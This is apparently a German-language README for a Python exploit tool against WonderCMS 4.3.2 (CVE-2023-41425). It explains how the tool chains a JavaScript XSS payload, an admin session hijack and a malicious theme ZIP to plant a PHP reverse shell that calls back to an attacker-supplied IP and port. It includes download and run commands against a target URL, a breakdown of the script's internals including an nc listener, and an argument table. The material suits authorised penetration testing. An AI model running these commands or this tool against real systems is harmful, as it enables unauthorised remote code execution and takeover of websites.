
Automatisiert die Erstellung und das Hosting eines JavaScript XSS Payloads, um ein bösartiges Themenmodul zu installieren, das eine Reverse Shell über Remote Code Execution in WonderCMS auslöst. Dieses Tool verwendet PentestMonkeys PHP-Reverse-Shell-Skript als Payload.
Dieses Python-basierte offensive Sicherheitstool automatisiert die Ausnutzung einer Remote Code Execution (RCE)-Sicherheitslücke in WonderCMS 4.3.2, speziell CVE-2023-41425. Es optimiert den Prozess der Erstellung eines schädlichen ZIP-Theme-Moduls und der Auslieferung eines JavaScript-basierten XSS-Payloads, um eine Admin-Sitzung zu kapern und eine PHP-Reverse-Shell zu installieren.
⚠️ Nur für Bildungs- und autorisierte Sicherheitstestzwecke.
Das Skript verwendet nur Pythons Standardbibliothek. Es sind keine externen Pakete erforderlich.
wget https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2/archive/refs/heads/main.zip
unzip main.zip
cd CVE-2023-41425-RCE-WonderCMS-4.3.2-main
git clone https://github.com/Tea-On/CVE-2023-41425-RCE-WonderCMS-4.3.2.git
cd ./CVE-2023-41425-RCE-WonderCMS-4.3.2
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r reverseShell.php
python3 exploit_CVE-2023-41425.py -u http://target/index.php?page=loginURL -H 192.168.0.100 -p 4444 -r ./reverseShell.php
Hier ist eine Aufschlüsselung, was das Skript intern tut:
Argument-Parsing:
argparse, um erforderliche und optionale Eingaben vom Angreifer zu sammeln.Reverse-Shell-Vorbereitung:
$ip und $port durch die angegebenen Werte von -H und -p.Erstellung des schädlichen ZIP-Archivs:
<dir_name>/<php_reverse_shell.php>.<zip_name>.zip.XSS-Payload-Generierung (script.js):
Anleitung & Exploit-Hosting:
nc-Listener-Befehl aus.Dieses Tool wird unter der MIT-Lizenz bereitgestellt.
Erstellt mit 🔥 von TeaOnHack🧋.
Dieses Projekt ist ausschließlich für Bildungszwecke und autorisierte Sicherheitsbewertungen gedacht. Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.
| Argument | Erforderlich | Beschreibung | Standard |
|---|
-u | ✅ | Ziel-WonderCMS-Anmelde-URL (z. B. http://target/index.php?...) | — |
-H, --host | ✅ | IP-Adresse des Angreifers (für Reverse Shell) | — |
-p | ✅ | Lauschport des Angreifers | — |
-r, --reverse-shell | ✅ | Pfad zum PHP-Reverse-Shell-Skript | — |
--dir-name | ❌ | Verzeichnis innerhalb des ZIP-Theme-Archivs | TeaOn |
--http-port | ❌ | Port für lokalen HTTP-Server | 3000 |
--zip-name | ❌ | Name der erzeugten ZIP-Datei | reverse-shell |